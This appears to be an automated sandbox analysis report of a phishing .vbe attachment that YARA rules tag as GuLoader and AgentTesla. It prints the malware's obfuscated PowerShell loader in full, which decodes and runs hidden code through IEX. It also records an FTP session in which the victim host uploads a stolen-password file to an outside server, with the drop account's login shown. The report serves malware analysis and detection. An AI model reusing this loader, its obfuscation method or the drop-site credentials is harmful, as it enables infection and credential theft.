                                Nov 28, 2022 18:14:03.371726990 CET317INData Raw: 1d 37 34 c0 06 b8 2c 1e 62 bb 7c 39 48 97 29 37 8b 19 76 ab e7 0c 5f 57 24 68 ae 1f 34 33 b0 3f 7b 0d 18 7e 08 19 05 bd 72 8b cb 33 2e ce 09 f8 c4 b2 95 4d 8a 27 1c 8b 4b d7 1e 1d 49 53 dd e6 9a 7f 74 91 3d 41 d0 cf b5 d5 30 70 11 45 19 5c 5a b8
                                Data Ascii: 74,b|9H)7v_W$h43?{~r3.M'KISt=A0pE\Zg=]{pja;+PI3Uatb.h0CV{w=j? ND]4{=Cn/>io5,B lq+z{/in.LE(2f\.bYaC{k=P
                                Nov 28, 2022 18:14:03.371789932 CET319INData Raw: 2b 6d 6f de 4d 69 5d 25 8c d2 f1 e9 dd f3 a2 e2 6f 24 c0 f5 23 2d ef 8c ca 17 38 89 0d 73 76 1f 9f 1b c7 6e ee b4 71 b7 de 60 f9 3c 57 64 65 6d 08 45 72 43 3c ed 16 3a dc e4 35 8d 60 95 b6 8a 02 9f 0f 04 7a 24 dd 5a 41 d6 04 e1 57 25 24 10 8c 7c
                                Data Ascii: +moMi]%o$#-8svnq`<WdemErC<:5`z$ZAW%$|wkib+zc?\mQ#ARFB["A_#4K:#-k:^YZSc'5Lp%^Eam~@[V$Zx|zX5f^D~
                                Nov 28, 2022 18:14:03.371854067 CET320INData Raw: c6 1a 70 60 fe 39 03 d2 67 2b 58 64 bb db b2 65 7f 1d 72 ff fa 18 4e f3 99 a6 aa 08 a5 50 8a a4 08 3f 2d cf d9 e0 ee 2e 59 c1 ae 15 56 a1 b8 d5 a6 92 64 2f 7d 9e 61 c4 f6 f4 c1 28 a8 3e fd f0 ef 32 fb 47 06 ef 95 de 6d f5 06 0d 8e c1 12 d4 3d b8
                                Data Ascii: p`9g+XderNP?-.YVd/}a(>2Gm=!TRb<Tfvo:?^\L;x%\%e{Rx&9rQAZn-i8xHz\`g/g:'ws?vP[>n_2F794vm~|>ze
                                Nov 28, 2022 18:14:03.371920109 CET322INData Raw: c1 aa 92 4c 34 43 2c 35 5a d8 de 72 7b ba 13 f7 78 e0 1e 8a d9 2c 39 6c 76 19 52 78 f0 5f 00 04 86 59 94 22 8b 9a 60 7b d9 cd c9 ea 1c 16 80 11 34 ab 7e 50 e2 1a 3f 60 eb e3 a3 30 2d d2 80 f1 f1 3e b8 d2 c1 9f a2 a7 11 3c d3 2d 6d 02 3d 64 82 06
                                Data Ascii: L4C,5Zr{x,9lvRx_Y"`{4~P?`0-><-m=d:623`Q'71GhQc?qJZ3$XT'>N{y'=@@x^\R?[O$1yu(-.Y^U`c#G(Gbkp~)(&&`Ww$nAo4K
                                Nov 28, 2022 18:14:03.486287117 CET323INData Raw: 42 f9 85 eb b1 dc 6c 35 b7 a7 8e 69 b5 82 3e 06 70 e7 d8 59 85 0a 41 e8 7c 1e 27 d2 37 01 71 6e c5 49 c5 2e d9 24 7d 50 63 15 e7 f8 fe 00 c0 9d e7 e4 c9 b8 18 4d 9c 31 17 d3 1c fa 06 ec 22 3d e2 5e ed 36 bc de 73 2a 00 93 6c cd 2f 4b 8e 6e f2 55
                                Data Ascii: Bl5i>pYA|'7qnI.$}PcM1"=^6s*l/KnUH+-H~"!d+fl%bdoa|T;*&vajtR.VriXj&e~Ge+p+[#.%LSE[&A1E]Eb6:U


                                HTTPS Proxied Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.11.204980554.91.59.199443C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                TimestampkBytes transferredDirectionData
                                2022-11-28 17:14:09 UTC0OUTGET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                Host: api.ipify.org
                                Connection: Keep-Alive
                                2022-11-28 17:14:10 UTC0INHTTP/1.1 200 OK
                                Server: Cowboy
                                Connection: close
                                Content-Type: text/plain
                                Vary: Origin
                                Date: Mon, 28 Nov 2022 17:14:10 GMT
                                Content-Length: 14
                                Via: 1.1 vegur
                                2022-11-28 17:14:10 UTC0INData Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 38 34
                                Data Ascii: 102.129.143.84


                                FTP Packets

                                TimestampSource PortDest PortSource IPDest IPCommands
                                Nov 28, 2022 18:14:17.958723068 CET2149807185.31.121.136192.168.11.20220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 19:14. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                Nov 28, 2022 18:14:17.959058046 CET4980721192.168.11.20185.31.121.136USER klogz@mcmprint.net
                                Nov 28, 2022 18:14:17.991482973 CET2149807185.31.121.136192.168.11.20331 User klogz@mcmprint.net OK. Password required
                                Nov 28, 2022 18:14:17.991899967 CET4980721192.168.11.20185.31.121.136PASS l9Hh{#_(0shZ
                                Nov 28, 2022 18:14:18.040401936 CET2149807185.31.121.136192.168.11.20230 OK. Current restricted directory is /
                                Nov 28, 2022 18:14:18.073179960 CET2149807185.31.121.136192.168.11.20504 Unknown command
                                Nov 28, 2022 18:14:18.073748112 CET4980721192.168.11.20185.31.121.136PWD
                                Nov 28, 2022 18:14:18.106071949 CET2149807185.31.121.136192.168.11.20257 "/" is your current location
                                Nov 28, 2022 18:14:18.106791973 CET4980721192.168.11.20185.31.121.136CWD /
                                Nov 28, 2022 18:14:18.139123917 CET2149807185.31.121.136192.168.11.20250 OK. Current directory is /
                                Nov 28, 2022 18:14:18.139384031 CET4980721192.168.11.20185.31.121.136TYPE I
                                Nov 28, 2022 18:14:18.171904087 CET2149807185.31.121.136192.168.11.20200 TYPE is now 8-bit binary
                                Nov 28, 2022 18:14:18.173265934 CET4980721192.168.11.20185.31.121.136PASV
                                Nov 28, 2022 18:14:18.205801964 CET2149807185.31.121.136192.168.11.20227 Entering Passive Mode (185,31,121,136,220,91)
                                Nov 28, 2022 18:14:18.239839077 CET4980721192.168.11.20185.31.121.136STOR PW_user-367706_2022_11_28_18_14_15.html
                                Nov 28, 2022 18:14:18.274036884 CET2149807185.31.121.136192.168.11.20150 Accepted data connection
                                Nov 28, 2022 18:14:18.306859016 CET2149807185.31.121.136192.168.11.20226-File successfully transferred
                                226-File successfully transferred226 0.033 seconds (measured here), 13.71 Kbytes per second
                                Nov 28, 2022 18:15:57.808657885 CET2149807185.31.121.136192.168.11.20226 Logout.

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:18:12:34
                                Start date:28/11/2022
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
                                Imagebase:0x7ff7b4380000
                                File size:170496 bytes
                                MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Target ID:2
                                Start time:18:12:36
                                Start date:28/11/2022
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:CMD.EXE /c echo C:\Windows
                                Imagebase:0x7ff7dd5d0000
                                File size:289792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Target ID:3
                                Start time:18:12:36
                                Start date:28/11/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b8be0000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:4
                                Start time:18:12:59
                                Start date:28/11/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""TakRaeOcrSpnDieSelHa3Ax2Ne`"""Ov)Su]InpTouVibStlSaiFucAb HasBltPhaDitFeiMacTo paeWaxSltSleRarTenCa ThiDenkatOv MiVJeiRersktLuuDiabalUnAPylUnlDaoCocAb(moimunGatke FevNa1Da,KoiGrnAntbi FivCr2Se,KriLanhvtAg Savaa3go,NoilenMatNa PavSe4Co)Im;Ma[DeDTilStlStIKlmpupLuoCarMitHa(Tv`"""BakVieEnrBenSteEllTh3Hu2bi`"""Tr)Pl]PopHauLabsalIniRacFj UnsBetBoasltDkiPocHi PhevaxGntNoeGurMrnFl AcIAgnIntKoPDatAnrOs SwELinWeuHamStSCoySksMatSlePlmfeLMooKacdeaKolCueSysDyWaf(OmuFoiBonChtMy TavBo1Ha,KiiSonOptSh FavUn2Ud)Un;Na}Li'Sl;Ar`$jeMHyeDatSuhmuyUrlLi3Ne=Ha[TiMAdeLytFehFoyMilCa1re]co:Ov:beVNoisyrretWhuAbaTelNoAAklGalUnoSicLi(In0Dr,ro1Ch0De4Ro8Le5Ob7sk6Co,Le1Me2Sp2Sv8Lo8Ea,No6ph4Mi)Mi;Re`$StSTaeBelKovRefLrlTrgEbeNylBeiBrgDu=Pr(BrGFieGytDe-reISttKreViminPDorSaoIrpBeeLarJetAfySc Ex-WoPCraSptAzhDe Tr'SvHveKFoCCoUUd:Co\CebKraResAnaBrlBotCa\DetAprGuaManFisNofEsonurMemKoaSktSkiByoAbnOushaaSulScgCioSkrExiVitCimSieCyregnIreUd'Pa)tu.LuBBoeEthsueAlaDyrStsReeJa;Be`$UnGHirEmiFosRakUneEn Bu=Bi Br[AsSTiyUnsObtTweDrmBe.LiCStoRenorvKieVarAptEn]Ma:Ap:GeFKlrInoMumUdBseaImsInePl6fi4CaSVotBarBaiTonWagva(Se`$BeSLeeSnlBlvJafHulAfgpeeFrlBeiPhgGi)Ap;Pu[PiSOvyelsThtOxeSemge.SiRObuFrnBrtapiMumKleju.PiISpnRatIneUnrSyoAppneSPreSkrCovTiiJacAkeLessl.SiMStaTarFosCohTaaprlFa]Bl:Ci:TrCBooOupSkyAf(Fl`$UnGKurPaiKrsBrkDrece,di Pe0Up,Br Vl Pi`$GlMNieBatBlhSiyMylDe3Pr,Pr Sp`$ZoGArrCriTesHakPheSt.PrcGroSpuPonKntSp)Ph;Ho[TiMHeeAltAkhKnyPrlFa1Au]Si:Ru:CuEHjnPruMemFrSKoyressetKoeSpmVoLSloNucCaaMulpeeinsOvWBr(Sa`$AvMSkeNotSthDdyStlMe3Ir,Ka Ud0Sl)Ne#Sc;""";Function Methyl4 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Teviss = $Teviss + $HS.Substring($i, 1); } $Teviss;}$Undefatigable0 = Methyl4 'SoIOrEReXAq ';$Undefatigable1= Methyl4 $Thyridia;&$Undefatigable0 $Undefatigable1;;
                                Imagebase:0xcd0000
                                File size:433152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.1784183387.00000000093A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:moderate

                                General

                                Target ID:5
                                Start time:18:12:59
                                Start date:28/11/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b8be0000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:15
                                Start time:18:13:30
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.cmdline
                                Imagebase:0xbb0000
                                File size:2141552 bytes
                                MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:moderate

                                General

                                Target ID:16
                                Start time:18:13:31
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FA6.tmp" "c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP"
                                Imagebase:0x3a0000
                                File size:46832 bytes
                                MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Target ID:17
                                Start time:18:13:51
                                Start date:28/11/2022
                                Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                                Imagebase:0xc90000
                                File size:106496 bytes
                                MD5 hash:7BAE06CBE364BB42B8C34FCFB90E3EBD
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000011.00000000.1525854532.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                Disassembly

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:10.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:270
                                  Total number of Limit Nodes:22
                                  execution_graph 53073 7d39081 53077 7cb4b08 53073->53077 53084 7cb4b07 53073->53084 53074 7d3908f 53078 7cb4b39 53077->53078 53079 7cb4cb7 53078->53079 53091 7cb5d09 53078->53091 53101 7cb6244 53078->53101 53107 7cb5fb4 53078->53107 53113 7cb5ea1 53078->53113 53079->53074 53085 7cb4b39 53084->53085 53086 7cb4cb7 53085->53086 53087 7cb5d09 GetFileAttributesW 53085->53087 53088 7cb5ea1 GetFileAttributesW 53085->53088 53089 7cb5fb4 GetFileAttributesW 53085->53089 53090 7cb6244 GetFileAttributesW 53085->53090 53086->53074 53087->53086 53088->53086 53089->53086 53090->53086 53092 7cb5d24 53091->53092 53119 7cb6cd8 53092->53119 53123 7cb6de1 53092->53123 53127 7cb6cd0 53092->53127 53093 7cb5e9c 53094 7cb5f67 53093->53094 53131 7cbc07a 53093->53131 53136 7cbbd21 53093->53136 53146 7cbbd30 53093->53146 53094->53079 53102 7cb5f07 53101->53102 53103 7cb5f67 53102->53103 53104 7cbc07a GetFileAttributesW 53102->53104 53105 7cbbd21 GetFileAttributesW 53102->53105 53106 7cbbd30 GetFileAttributesW 53102->53106 53103->53079 53104->53103 53105->53103 53106->53103 53108 7cb5fbc 53107->53108 53110 7cbc07a GetFileAttributesW 53108->53110 53111 7cbbd21 GetFileAttributesW 53108->53111 53112 7cbbd30 GetFileAttributesW 53108->53112 53109 7cb6030 53110->53109 53111->53109 53112->53109 53114 7cb5ea6 53113->53114 53115 7cb5f67 53114->53115 53116 7cbc07a GetFileAttributesW 53114->53116 53117 7cbbd21 GetFileAttributesW 53114->53117 53118 7cbbd30 GetFileAttributesW 53114->53118 53115->53079 53116->53115 53117->53115 53118->53115 53120 7cb6d07 53119->53120 53121 7cb6dc3 53119->53121 53120->53121 53156 7cb7354 53120->53156 53121->53093 53124 7cb6d9e 53123->53124 53125 7cb6dc3 53124->53125 53126 7cb7354 GetFileAttributesW 53124->53126 53126->53125 53128 7cb6cd8 53127->53128 53129 7cb6dc3 53128->53129 53130 7cb7354 GetFileAttributesW 53128->53130 53129->53093 53130->53129 53132 7cbc07e 53131->53132 53133 7cbc007 53131->53133 53133->53094 53133->53131 53252 7cbc10a 53133->53252 53257 7cbc156 53133->53257 53139 7cbbd30 53136->53139 53137 7cbc08f 53137->53094 53139->53137 53302 7cb9740 53139->53302 53140 7cbbda5 53141 7cb9740 GetFileAttributesW 53140->53141 53143 7cbbdb3 53140->53143 53141->53143 53142 7cbc07e 53143->53094 53143->53142 53144 7cbc10a GetFileAttributesW 53143->53144 53145 7cbc156 GetFileAttributesW 53143->53145 53144->53143 53145->53143 53147 7cbbd55 53146->53147 53148 7cbc08f 53146->53148 53149 7cb9740 GetFileAttributesW 53147->53149 53148->53094 53150 7cbbda5 53149->53150 53151 7cb9740 GetFileAttributesW 53150->53151 53153 7cbbdb3 53150->53153 53151->53153 53152 7cbc07e 53153->53094 53153->53152 53154 7cbc10a GetFileAttributesW 53153->53154 53155 7cbc156 GetFileAttributesW 53153->53155 53154->53153 53155->53153 53157 7cb7393 53156->53157 53164 7cb7354 GetFileAttributesW 53157->53164 53170 7cb782e 53157->53170 53177 7cb79f1 53157->53177 53184 7cb78b0 53157->53184 53158 7cb73fe 53159 7cb7564 53158->53159 53191 7cbaebe 53158->53191 53165 7cb7c05 53159->53165 53166 7cb782e GetFileAttributesW 53159->53166 53167 7cb79f1 GetFileAttributesW 53159->53167 53168 7cb78b0 GetFileAttributesW 53159->53168 53169 7cb7354 GetFileAttributesW 53159->53169 53164->53158 53165->53121 53166->53165 53167->53165 53168->53165 53169->53165 53171 7cb7843 53170->53171 53172 7cb7c05 53171->53172 53173 7cb782e GetFileAttributesW 53171->53173 53174 7cb79f1 GetFileAttributesW 53171->53174 53175 7cb78b0 GetFileAttributesW 53171->53175 53176 7cb7354 GetFileAttributesW 53171->53176 53172->53158 53173->53172 53174->53172 53175->53172 53176->53172 53178 7cb79fd 53177->53178 53179 7cb7c05 53178->53179 53180 7cb782e GetFileAttributesW 53178->53180 53181 7cb79f1 GetFileAttributesW 53178->53181 53182 7cb78b0 GetFileAttributesW 53178->53182 53183 7cb7354 GetFileAttributesW 53178->53183 53179->53158 53180->53179 53181->53179 53182->53179 53183->53179 53185 7cb78d8 53184->53185 53186 7cb7c05 53184->53186 53185->53186 53187 7cb782e GetFileAttributesW 53185->53187 53188 7cb79f1 GetFileAttributesW 53185->53188 53189 7cb78b0 GetFileAttributesW 53185->53189 53190 7cb7354 GetFileAttributesW 53185->53190 53186->53158 53187->53186 53188->53186 53189->53186 53190->53186 53192 7cbaec7 53191->53192 53193 7cbaf89 53192->53193 53197 7cbb468 53192->53197 53204 7cbb398 53192->53204 53211 7cbb388 53192->53211 53198 7cbb47f 53197->53198 53200 7cbb487 53197->53200 53198->53193 53199 7cbb578 53199->53193 53200->53199 53217 7cbb640 53200->53217 53221 7cbb630 53200->53221 53201 7cbb60d 53201->53193 53205 7cbb39f 53204->53205 53206 7cbb3a7 53204->53206 53205->53193 53207 7cbb3f9 53206->53207 53209 7cbb640 GetFileAttributesW 53206->53209 53210 7cbb630 GetFileAttributesW 53206->53210 53207->53193 53208 7cbb60d 53208->53193 53209->53208 53210->53208 53213 7cbb398 53211->53213 53212 7cbb39f 53212->53193 53213->53212 53215 7cbb640 GetFileAttributesW 53213->53215 53216 7cbb630 GetFileAttributesW 53213->53216 53214 7cbb60d 53214->53193 53215->53214 53216->53214 53226 7cbb67f 53217->53226 53232 7cbb690 53217->53232 53218 7cbb65e 53218->53201 53222 7cbb640 53221->53222 53224 7cbb67f GetFileAttributesW 53222->53224 53225 7cbb690 GetFileAttributesW 53222->53225 53223 7cbb65e 53223->53201 53224->53223 53225->53223 53227 7cbb690 53226->53227 53228 7cbb96c 53227->53228 53238 c574a0 53227->53238 53243 c574b0 53227->53243 53229 7cbb6ff 53229->53218 53233 7cbb6bb 53232->53233 53234 7cbb96c 53233->53234 53236 c574a0 GetFileAttributesW 53233->53236 53237 c574b0 GetFileAttributesW 53233->53237 53235 7cbb6ff 53235->53218 53236->53235 53237->53235 53239 c574c8 53238->53239 53240 c574dd 53239->53240 53248 c55e64 53239->53248 53240->53229 53244 c574c8 53243->53244 53245 c574dd 53244->53245 53246 c55e64 GetFileAttributesW 53244->53246 53245->53229 53247 c5750e 53246->53247 53247->53229 53249 c58140 GetFileAttributesW 53248->53249 53251 c5750e 53249->53251 53251->53229 53253 7cbc112 53252->53253 53254 7cbc097 53252->53254 53255 7cbc135 53253->53255 53261 7cbc21b 53253->53261 53254->53133 53255->53133 53258 7cbc12c 53257->53258 53260 7cbc21b GetFileAttributesW 53258->53260 53259 7cbc135 53259->53133 53260->53259 53262 7cbc240 53261->53262 53265 7cbc883 53262->53265 53263 7cbc283 53263->53255 53266 7cbc887 53265->53266 53267 7cbc91b 53266->53267 53270 7cbd03b 53266->53270 53280 7cbd040 53266->53280 53267->53263 53272 7cbd040 53270->53272 53271 7cbd1b8 53271->53267 53272->53271 53273 7cbd295 53272->53273 53275 7cbd03b GetFileAttributesW 53272->53275 53277 7cbd040 GetFileAttributesW 53272->53277 53290 c56790 53272->53290 53294 7cbd3d0 53273->53294 53298 7cbd3e0 53273->53298 53274 7cbd37c 53274->53267 53275->53272 53277->53272 53282 7cbd05d 53280->53282 53281 7cbd1b8 53281->53267 53282->53281 53283 7cbd295 53282->53283 53285 7cbd03b GetFileAttributesW 53282->53285 53286 c56790 GetFileAttributesW 53282->53286 53287 7cbd040 GetFileAttributesW 53282->53287 53288 7cbd3d0 GetFileAttributesW 53283->53288 53289 7cbd3e0 GetFileAttributesW 53283->53289 53284 7cbd37c 53284->53267 53285->53282 53286->53282 53287->53282 53288->53284 53289->53284 53292 c574a0 GetFileAttributesW 53290->53292 53293 c574b0 GetFileAttributesW 53290->53293 53291 c567aa 53291->53272 53292->53291 53293->53291 53296 c574a0 GetFileAttributesW 53294->53296 53297 c574b0 GetFileAttributesW 53294->53297 53295 7cbd3fa 53295->53274 53296->53295 53297->53295 53299 7cbd3fa 53298->53299 53300 c574a0 GetFileAttributesW 53298->53300 53301 c574b0 GetFileAttributesW 53298->53301 53299->53274 53300->53299 53301->53299 53303 7cb97f9 53302->53303 53304 7cb9769 53302->53304 53303->53140 53304->53303 53305 7cb78b0 GetFileAttributesW 53304->53305 53305->53303 53306 82c3ef8 53307 82c3f2c 53306->53307 53308 82c43d3 53307->53308 53310 82c970c 53307->53310 53314 82c9c68 53310->53314 53318 82c9c60 53310->53318 53311 82c9719 53315 82c9c7a 53314->53315 53316 82c9c84 53314->53316 53315->53316 53322 82ca483 53315->53322 53316->53311 53319 82c9c68 53318->53319 53320 82c9c84 53319->53320 53321 82ca483 SetThreadUILanguage 53319->53321 53320->53311 53321->53320 53325 82cb662 53322->53325 53323 82ca48e 53323->53316 53327 82cb67e 53325->53327 53326 82cb6ee 53326->53323 53327->53326 53329 82cc290 53327->53329 53330 82cc2b8 53329->53330 53332 82cc42e 53330->53332 53333 82cbb50 53330->53333 53334 82cc940 SetThreadUILanguage 53333->53334 53336 82cc9b1 53334->53336 53336->53332 53337 82cc248 53338 82cc254 53337->53338 53339 82cc276 53337->53339 53338->53339 53340 82cc290 SetThreadUILanguage 53338->53340 53340->53338 53341 7cbd627 53342 7cbd648 53341->53342 53343 7cb9740 GetFileAttributesW 53342->53343 53344 7cbd69b 53343->53344 53345 7cb6cd8 GetFileAttributesW 53344->53345 53346 7cbd6a3 53344->53346 53345->53346 53347 c51628 53348 c5163a 53347->53348 53352 c54c57 53348->53352 53357 c54c58 53348->53357 53349 c5166a 53353 